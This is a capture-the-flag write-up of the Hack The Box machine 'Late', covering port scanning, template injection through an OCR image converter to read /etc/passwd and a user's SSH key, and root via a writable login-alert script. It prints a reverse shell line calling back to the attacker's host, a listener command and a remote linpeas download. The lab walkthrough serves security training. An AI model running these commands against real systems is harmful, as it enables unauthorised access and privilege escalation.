HTB Late
03 Aug 2022 - GRX6
Reconnaissance/Intelligence Gathering
In this step we collect the target information available in public repositories or sources. We do everything passively.
Scanning and enumeration
Now it’s time to start the active scanning.
As always, we define our TARGET and hosts file of our machine to facilitate the process.
TARGET=<ip_of_the_machine>
sudo nano /etc/hosts # Add a line with the machine IP /t late.htb
We launch a single TCMP probe to check ping.
ping -c 1 $TARGET # => Ping is working
NMAP
To scan the target to find open ports and possible vulnerabilities we use nmap.
First, simple TCP scan without DNS resolution and ping discovery, to all the ports and with the version detection.
nmap -n -Pn -sV -p- $TARGET -vvv -oG allPorts
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Then we launch the standard scripts in the ports open but nothing shows.
nmap -n -Pn -sVC -p22,80 $TARGET -oN targeted
We launch also a UDP scan.
sudo nmap -n -Pn -sV -sU -p- $TARGET -vvv -oG allPortsUDP
Directory fuzzing
wfuzz -c --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://late.htb/FUZZ
We find assets (normal stuff in a website).
Subdomain
Visiting the site we see that there is already a link to http://images.late.htb. We can add it also to the hosts file.
echo '10.10.11.156 images.late.htb' | sudo tee -a /etc/hosts
The site is a flask utility to convert images to text. This is a nice project by lucadibello.
We can do some random tests with images with text to verify that after clicking in SCAN the application is using OCR tesseract to read the text in the image.
Gaining access
To gain access to the system, the test consists in using template injection in the text that the application is reading SSTI. The repo from luca is not vulnerable but we will try.
The process consists in crafting an image with the ``.
After a lot of trial and error and following hacktricks recommendations I managed to get the /etc/passwd.
And then we try to obtain the ssh key from the user with login (svc_acc)
Like always we must set the correct permissions to our id_rsa file.
chmod 400 id_rsa
ssh -i id_rsa svc_acc@late.htb
Internal reconnaissance
User flag can be obtained directly from the home of the user. We can see that we have an app folder in the home directory that it is running the web application.
Here we can see the code that is vulnerable to SSTI.
import datetime
import os, random
from flask.templating import render_template_string
from werkzeug.utils import secure_filename
import PIL.Image
import pytesseract
from PIL import Image
from flask import Flask, request, render_template, redirect, url_for, session, send_file
app = Flask(__name__)
upload_dir = "/home/svc_acc/app/uploads"
misc_dir = '/home/svc_acc/app/misc'
allowed_extensions = ["jpg" ,'png']
app.secret_key = b'_5#y2L"F4Q8z\n\xec]/'
@app.route('/')
def home():
return render_template("index.html", title="Image Reader")
@app.route('/scanner', methods=['GET', 'POST'])
def scan_file():
scanned_text = ''
results = ''
if request.method == 'POST':
start_time = datetime.datetime.now()
f = request.files['file']
if f.filename.split('.')[-1] in allowed_extensions:
try:
ID = str(random.randint(1,10000))
file_name = upload_dir + "/" + secure_filename(f.filename )+ ID
f.save(file_name)
pytesseract.pytesseract.tesseract_cmd = r'/usr/bin/tesseract'
scanned_text = pytesseract.image_to_string(PIL.Image.open(file_name))
results = """<p>{}</p>""".format(scanned_text)
r = render_template_string(results)
path = misc_dir + "/" + ID + '_' + 'results.txt'
with open(path, 'w') as f:
f.write(r)
return send_file(path, as_attachment=True,attachment_filename='results.txt')
except Exception as e:
return ('Error occured while processing the image: ' + str(e))
else:
return 'Invalid Extension'
I like to execute linpeas.sh to explore the machine.
Host
id
uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)
whoami
svc_acc
sudo -l
[sudo] password for svc_acc:
hostname
late
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.156 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:a38 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:a38 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:0a:38 txqueuelen 1000 (Ethernet)
RX packets 92021 bytes 9382261 (9.3 MB)
RX errors 0 dropped 38 overruns 0 frame 0
TX packets 86720 bytes 14758043 (14.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 85257 bytes 10350294 (10.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 85257 bytes 10350294 (10.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Network
mount
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,nosuid,relatime,size=987732k,nr_inodes=246933,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=204116k,mode=755)
/dev/mapper/ubuntu--vg-ubuntu--lv on / type ext4 (rw,relatime,data=ordered)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/unified type cgroup2 (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=25,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=14470)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
mqueue on /dev/mqueue type mqueue (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime,pagesize=2M)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
configfs on /sys/kernel/config type configfs (rw,relatime)
/dev/sda2 on /boot type ext4 (rw,relatime,data=ordered)
lxcfs on /var/lib/lxcfs type fuse.lxcfs (rw,nosuid,nodev,relatime,user_id=0,group_id=0,allow_other)
tmpfs on /run/user/1000 type tmpfs (rw,nosuid,nodev,relatime,size=204112k,mode=700,uid=1000,gid=1000)
netstat -nlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN 1199/python3
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:5353 0.0.0.0:* -
udp 0 0 0.0.0.0:57672 0.0.0.0:* -
udp6 0 0 :::5353 :::* -
udp6 0 0 :::38142 :::* -
Active UNIX domain sockets (only servers)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] SEQPACKET LISTENING 13241 - /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 69690 4127/systemd /run/user/1000/systemd/private
unix 2 [ ACC ] STREAM LISTENING 69694 4127/systemd /run/user/1000/bus
unix 2 [ ACC ] STREAM LISTENING 69695 4127/systemd /run/user/1000/gnupg/S.dirmngr
unix 2 [ ACC ] STREAM LISTENING 69696 4127/systemd /run/user/1000/gnupg/S.gpg-agent.extra
unix 2 [ ACC ] STREAM LISTENING 69697 4127/systemd /run/user/1000/gnupg/S.gpg-agent.ssh
unix 2 [ ACC ] STREAM LISTENING 69698 4127/systemd /run/user/1000/gnupg/S.gpg-agent
unix 2 [ ACC ] STREAM LISTENING 69699 4127/systemd /run/user/1000/gnupg/S.gpg-agent.browser
unix 2 [ ACC ] STREAM LISTENING 18890 - /run/uuidd/request
unix 2 [ ACC ] STREAM LISTENING 18896 - /var/run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 18899 - /run/avahi-daemon/socket
unix 2 [ ACC ] STREAM LISTENING 19707 - @irqbalance1028.sock
unix 2 [ ACC ] STREAM LISTENING 18888 - /var/lib/lxd/unix.socket
unix 2 [ ACC ] STREAM LISTENING 23236 - /var/run/sendmail/mta/smcontrol
unix 2 [ ACC ] STREAM LISTENING 17267 - /var/run/vmware/guestServicePipe
unix 2 [ ACC ] STREAM LISTENING 18881 - @ISCSIADM_ABSTRACT_NAMESPACE
unix 2 [ ACC ] STREAM LISTENING 14462 - /run/systemd/private
unix 2 [ ACC ] STREAM LISTENING 14473 - /run/systemd/journal/stdout
unix 2 [ ACC ] STREAM LISTENING 13228 - /run/lvm/lvmetad.socket
unix 2 [ ACC ] STREAM LISTENING 13238 - /run/lvm/lvmpolld.socket
unix 2 [ ACC ] STREAM LISTENING 18882 - /run/acpid.socket
Process
ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.4 159576 8776 ? Ss 18:36 0:03 /sbin/init maybe-ubiquity
root 2 0.0 0.0 0 0 ? S 18:36 0:00 [kthreadd]
root 4 0.0 0.0 0 0 ? I< 18:36 0:00 [kworker/0:0H]
root 6 0.0 0.0 0 0 ? I< 18:36 0:00 [mm_percpu_wq]
root 7 0.0 0.0 0 0 ? S 18:36 0:00 [ksoftirqd/0]
root 8 0.0 0.0 0 0 ? I 18:36 0:02 [rcu_sched]
root 9 0.0 0.0 0 0 ? I 18:36 0:00 [rcu_bh]
root 10 0.0 0.0 0 0 ? S 18:36 0:00 [migration/0]
root 11 0.0 0.0 0 0 ? S 18:36 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S 18:36 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S 18:36 0:00 [cpuhp/1]
root 14 0.0 0.0 0 0 ? S 18:36 0:00 [watchdog/1]
root 15 0.0 0.0 0 0 ? S 18:36 0:00 [migration/1]
root 16 0.0 0.0 0 0 ? S 18:36 0:00 [ksoftirqd/1]
root 18 0.0 0.0 0 0 ? I< 18:36 0:00 [kworker/1:0H]
root 19 0.0 0.0 0 0 ? S 18:36 0:00 [kdevtmpfs]
root 20 0.0 0.0 0 0 ? I< 18:36 0:00 [netns]
root 21 0.0 0.0 0 0 ? S 18:36 0:00 [rcu_tasks_kthre]
root 22 0.0 0.0 0 0 ? S 18:36 0:00 [kauditd]
root 23 0.0 0.0 0 0 ? I 18:36 0:00 [kworker/0:1]
root 24 0.0 0.0 0 0 ? S 18:36 0:00 [khungtaskd]
root 25 0.0 0.0 0 0 ? S 18:36 0:00 [oom_reaper]
root 26 0.0 0.0 0 0 ? I< 18:36 0:00 [writeback]
root 27 0.0 0.0 0 0 ? S 18:36 0:00 [kcompactd0]
root 28 0.0 0.0 0 0 ? SN 18:36 0:00 [ksmd]
root 29 0.0 0.0 0 0 ? SN 18:36 0:00 [khugepaged]
root 30 0.0 0.0 0 0 ? I< 18:36 0:00 [crypto]
root 31 0.0 0.0 0 0 ? I< 18:36 0:00 [kintegrityd]
root 32 0.0 0.0 0 0 ? I< 18:36 0:00 [kblockd]
root 33 0.0 0.0 0 0 ? I< 18:36 0:00 [ata_sff]
root 34 0.0 0.0 0 0 ? I< 18:36 0:00 [md]
root 35 0.0 0.0 0 0 ? I< 18:36 0:00 [edac-poller]
root 36 0.0 0.0 0 0 ? I< 18:36 0:00 [devfreq_wq]
root 37 0.0 0.0 0 0 ? I< 18:36 0:00 [watchdogd]
root 41 0.0 0.0 0 0 ? S 18:36 0:00 [kswapd0]
root 42 0.0 0.0 0 0 ? I< 18:36 0:00 [kworker/u5:0]
root 43 0.0 0.0 0 0 ? S 18:36 0:00 [ecryptfs-kthrea]
root 85 0.0 0.0 0 0 ? I< 18:36 0:00 [kthrotld]
root 86 0.0 0.0 0 0 ? I< 18:36 0:00 [acpi_thermal_pm]
root 87 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_0]
root 88 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_0]
root 89 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_1]
root 90 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_1]
root 96 0.0 0.0 0 0 ? I< 18:36 0:00 [ipv6_addrconf]
root 105 0.0 0.0 0 0 ? I< 18:36 0:00 [kstrp]
root 122 0.0 0.0 0 0 ? I< 18:36 0:00 [charger_manager]
root 124 0.0 0.0 0 0 ? I 18:36 0:00 [kworker/0:2]
root 173 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_2]
root 174 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_2]
root 175 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_3]
root 176 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_3]
root 177 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_4]
root 178 0.0 0.0 0 0 ? I< 18:36 0:00 [ttm_swap]
root 179 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_4]
root 180 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_5]
root 181 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_5]
root 182 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_6]
root 183 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_6]
root 184 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_7]
root 185 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_7]
root 186 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_8]
root 187 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_8]
root 188 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_9]
root 189 0.0 0.0 0 0 ? S 18:36 0:00 [irq/16-vmwgfx]
root 190 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_9]
root 191 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_10]
root 192 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_10]
root 193 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_11]
root 194 0.0 0.0 0 0 ? I< 18:36 0:00 [mpt_poll_0]
root 195 0.0 0.0 0 0 ? I< 18:36 0:00 [mpt/0]
root 196 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_11]
root 197 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_12]
root 198 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_12]
root 199 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_13]
root 200 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_13]
root 201 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_14]
root 202 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_14]
root 203 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_15]
root 204 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_15]
root 205 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_16]
root 206 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_16]
root 207 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_17]
root 212 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_17]
root 216 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_18]
root 221 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_18]
root 223 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_19]
root 226 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_19]
root 231 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_20]
root 232 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_20]
root 233 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_21]
root 248 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_21]
root 250 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_22]
root 251 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_22]
root 253 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_23]
root 254 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_23]
root 255 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_24]
root 256 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_24]
root 257 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_25]
root 259 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_25]
root 260 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_26]
root 261 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_26]
root 262 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_27]
root 263 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_27]
root 264 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_28]
root 265 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_28]
root 266 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_29]
root 268 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_29]
root 269 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_30]
root 270 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_30]
root 271 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_31]
root 272 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_31]
root 310 0.0 0.0 0 0 ? S 18:36 0:00 [scsi_eh_32]
root 311 0.0 0.0 0 0 ? I< 18:36 0:00 [scsi_tmf_32]
root 313 0.0 0.0 0 0 ? I< 18:36 0:00 [kworker/1:1H]
root 316 0.0 0.0 0 0 ? I< 18:36 0:00 [kworker/0:1H]
root 322 0.0 0.0 0 0 ? I< 18:36 0:00 [kdmflush]
root 323 0.0 0.0 0 0 ? I< 18:36 0:00 [bioset]
root 324 0.0 0.0 0 0 ? I< 18:36 0:00 [kdmflush]
root 326 0.0 0.0 0 0 ? I< 18:36 0:00 [bioset]
root 403 0.0 0.0 0 0 ? I< 18:36 0:00 [raid5wq]
root 460 0.0 0.0 0 0 ? S 18:36 0:00 [jbd2/dm-0-8]
root 461 0.0 0.0 0 0 ? I< 18:36 0:00 [ext4-rsv-conver]
root 538 0.0 0.5 127716 11080 ? S<s 18:36 0:00 /lib/systemd/systemd-journald
root 539 0.0 0.0 0 0 ? I< 18:36 0:00 [iscsi_eh]
root 545 0.0 0.0 105912 1780 ? Ss 18:36 0:00 /sbin/lvmetad -f
root 546 0.0 0.0 0 0 ? I< 18:36 0:00 [ib-comp-wq]
root 547 0.0 0.0 0 0 ? I< 18:36 0:00 [ib-comp-unb-wq]
root 548 0.0 0.0 0 0 ? I< 18:36 0:00 [ib_mcast]
root 549 0.0 0.0 0 0 ? I< 18:36 0:00 [ib_nl_sa_wq]
root 553 0.0 0.0 0 0 ? I< 18:36 0:00 [rdma_cm]
root 555 0.0 0.0 0 0 ? I 18:36 0:04 [kworker/1:3]
root 561 0.0 0.2 46536 5080 ? Ss 18:36 0:01 /lib/systemd/systemd-udevd
root 600 0.0 0.0 0 0 ? S 18:36 0:00 [jbd2/sda2-8]
root 601 0.0 0.0 0 0 ? I< 18:36 0:00 [ext4-rsv-conver]
systemd+ 615 0.0 0.1 145972 3224 ? Ssl 18:36 0:00 /lib/systemd/systemd-timesyncd
root 698 0.0 0.4 89872 10020 ? Ss 18:36 0:00 /usr/bin/VGAuthService
root 701 0.0 0.3 225736 7168 ? S<sl 18:36 0:10 /usr/bin/vmtoolsd
systemd+ 838 0.0 0.2 71732 5060 ? Ss 18:36 0:00 /lib/systemd/systemd-networkd
systemd+ 855 0.0 0.2 70500 4984 ? Ss 18:36 0:00 /lib/systemd/systemd-resolved
root 1007 0.0 0.0 95548 1560 ? Ssl 18:36 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root 1008 0.0 0.4 434328 9640 ? Ssl 18:36 0:00 /usr/sbin/ModemManager --filter-policy=strict
syslog 1013 0.0 0.2 263044 4336 ? Ssl 18:36 0:00 /usr/sbin/rsyslogd -n
daemon 1016 0.0 0.1 28340 2468 ? Ss 18:36 0:00 /usr/sbin/atd -f
root 1028 0.0 0.0 110556 2028 ? Ssl 18:36 0:00 /usr/sbin/irqbalance --foreground
root 1029 0.0 0.3 286260 6716 ? Ssl 18:36 0:00 /usr/lib/accountsservice/accounts-daemon
root 1030 0.0 0.2 70476 5936 ? Ss 18:36 0:00 /lib/systemd/systemd-logind
root 1036 0.0 0.8 169104 17100 ? Ssl 18:36 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
avahi 1037 0.0 0.1 47212 3780 ? Ss 18:36 0:00 avahi-daemon: running [late.local]
root 1048 0.0 0.1 30036 3320 ? Ss 18:36 0:00 /usr/sbin/cron -f
message+ 1050 0.0 0.2 50380 4828 ? Ss 18:36 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile -
avahi 1059 0.0 0.0 47084 340 ? S 18:36 0:00 avahi-daemon: chroot helper
root 1104 0.0 0.7 479236 16032 ? Ssl 18:36 0:01 /usr/sbin/NetworkManager --no-daemon
root 1105 0.0 0.2 45240 5492 ? Ss 18:36 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root 1164 0.0 0.3 288888 6604 ? Ssl 18:36 0:00 /usr/lib/policykit-1/polkitd --no-debug
svc_acc 1199 0.0 1.1 60704 22828 ? Ss 18:36 0:02 /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
root 1245 0.0 0.0 141720 1576 ? Ss 18:36 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data 1246 0.0 0.3 144016 7296 ? S 18:36 0:00 nginx: worker process
www-data 1247 0.0 0.3 144016 7296 ? S 18:36 0:01 nginx: worker process
root 1284 0.0 0.3 72308 6548 ? Ss 18:36 0:00 /usr/sbin/sshd -D
root 1297 0.0 0.1 14896 2044 tty1 Ss+ 18:36 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
svc_acc 1467 0.0 1.8 106596 38396 ? S 18:36 0:04 /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
svc_acc 1481 0.0 1.7 104864 36496 ? S 18:36 0:04 /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
svc_acc 1502 0.0 1.7 103740 35328 ? S 18:36 0:03 /usr/bin/python3 /usr/local/bin/gunicorn --workers 3 wsgi:app
root 1541 0.0 0.2 124836 5244 ? Ss 18:36 0:00 sendmail: MTA: accepting connections
root 2072 0.0 0.0 0 0 ? I 18:51 0:00 [kworker/1:0]
root 2865 0.0 0.0 0 0 ? R 19:54 0:00 [kworker/u4:0]
root 3281 0.0 0.0 0 0 ? I 20:26 0:00 [kworker/u4:1]
svc_acc 4094 0.0 0.0 0 0 ? Z 21:21 0:00 [sh] <defunct>
root 4122 0.0 0.3 112148 7400 ? Ss 21:23 0:00 sshd: svc_acc [priv]
svc_acc 4127 0.0 0.3 76660 7660 ? Ss 21:23 0:00 /lib/systemd/systemd --user
svc_acc 4128 0.0 0.1 195648 2376 ? S 21:23 0:00 (sd-pam)
svc_acc 4147 0.0 0.1 112148 3656 ? R 21:23 0:00 sshd: svc_acc@pts/0
svc_acc 4148 0.0 0.2 21472 5276 pts/0 Ss 21:23 0:00 -bash
svc_acc 4378 0.0 0.1 38380 3652 pts/0 R+ 21:35 0:00 ps aux
Interesting files
find / -type f -user svc_acc 2>/dev/null
/usr/local/sbin/ssh-alert.sh
Linpeas
In my system.
python3 -m http.server 7890
mktemp -d
cd /tmp/tmp.RVkAHAuLJK
curl http://<my_ip>:7890/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh > linpeas.out
Maintaining access
We already have the ssh key for the user…
Installation
No need to install anything.
Command and Control
No need to install anything.
Privilege escalation / lateral movements
We can see that the application has internal open ports that are not available to the public. It’s the teseract application converting the images.
The other point that we will check is the ssh-alert.sh file.
#!/bin/bash
RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"
BODY="
A SSH login was detected.
User: $PAM_USER
User IP Host: $PAM_RHOST
Service: $PAM_SERVICE
TTY: $PAM_TTY
Date: `date`
Server: `uname -a`
"
if [ ${PAM_TYPE} = "open_session" ]; then
echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi
In order to escalate privileges we just need to include a reverse shell into the bash script and do a ssh login.
echo "bash -i >& /dev/tcp/<my_ip>/4321 0>&1" >> /usr/local/sbin/ssh-alert.sh
And open the listener.
nc -nlvp 4321
The user will be root and the flag can be obtained.
Exfiltration
Maintaining access
Not needed as we are talking of a HTB machine…
Covering tracks
Not needed as we are talking of a HTB machine…